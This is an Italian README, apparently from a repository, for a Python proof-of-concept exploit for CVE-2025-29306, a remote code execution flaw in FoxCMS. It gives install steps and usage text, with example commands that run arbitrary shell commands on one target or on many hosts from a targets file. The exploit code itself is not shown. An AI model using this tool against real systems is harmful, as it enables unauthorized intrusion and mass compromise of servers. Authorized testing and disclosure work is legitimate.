
Proof-of-Concept (PoC) per CVE-2025-29306, una vulnerabilità di esecuzione di codice in remoto in FoxCMS. Questo script Python scansiona uno o più target, esegue comandi e segnala gli host vulnerabili.
Un exploit Python per CVE-2025-29306, una vulnerabilità di remote code execution in FoxCMS. Questo strumento consente di testare singoli target o di scansionare più host in massa.
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE
.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt
requestsbeautifulsoup4argparseInstalla i requisiti con:
pip install requests beautifulsoup4
usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)
CVE-2025-29306 Exploit Checker
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Command to execute on vulnerable hosts
-t TARGET, --target TARGET
Single target in the format ip:port
-f TARGETS_FILE, --targets-file TARGETS_FILE
File containing multiple targets, one per line, in the format ip:port
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txt
Il file dei target deve contenere un target per riga nel formato:
ip:port
Esempio:
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
Lo script fornisce:
foxcms_rce_results.txt
Questo strumento è destinato esclusivamente a scopo educativo e a test autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo programma.
Licenza MIT - Consulta il file LICENSE per i dettagli